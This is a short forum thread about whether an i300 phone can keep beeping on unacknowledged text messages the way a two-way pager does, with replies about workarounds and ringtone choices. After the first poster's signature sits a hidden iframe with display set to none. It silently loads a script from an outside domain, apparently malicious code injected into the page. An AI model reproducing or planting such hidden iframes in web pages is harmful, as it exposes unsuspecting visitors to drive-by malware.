    Using I300 as a Pager

I'm hoping the i300 can replace yet another electric item on my belt: my two-way Skytel pager.

The text messaging capability (#@messaging.sprintpcs.com) works in the sense that the phone does ring upon first receipt of a message BUT it does not continue to beep until acknowledged like my pager does. I find this continuous periodic alerting till acknowledged feature critical for alerts received while sleeping or while I was temporarily away from the phone.

Is there any way to setup this function on the i300???

    Thanks. -- John<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

No. A simple remedy, however, is to delete mesages once viewed and that way whenever you see the icon at the top of the screen, you'll know you've got a new message. I used to carry a pager around on silent. I'd have to look down to check for pages. Same deal.

    Too bad....

Okay, so in your opinion, what's the loudest/most-annoying sound to select?

I think we agreed on number 1. Its the standard, and with everyone trying to be different today, that one tends to be skipped.
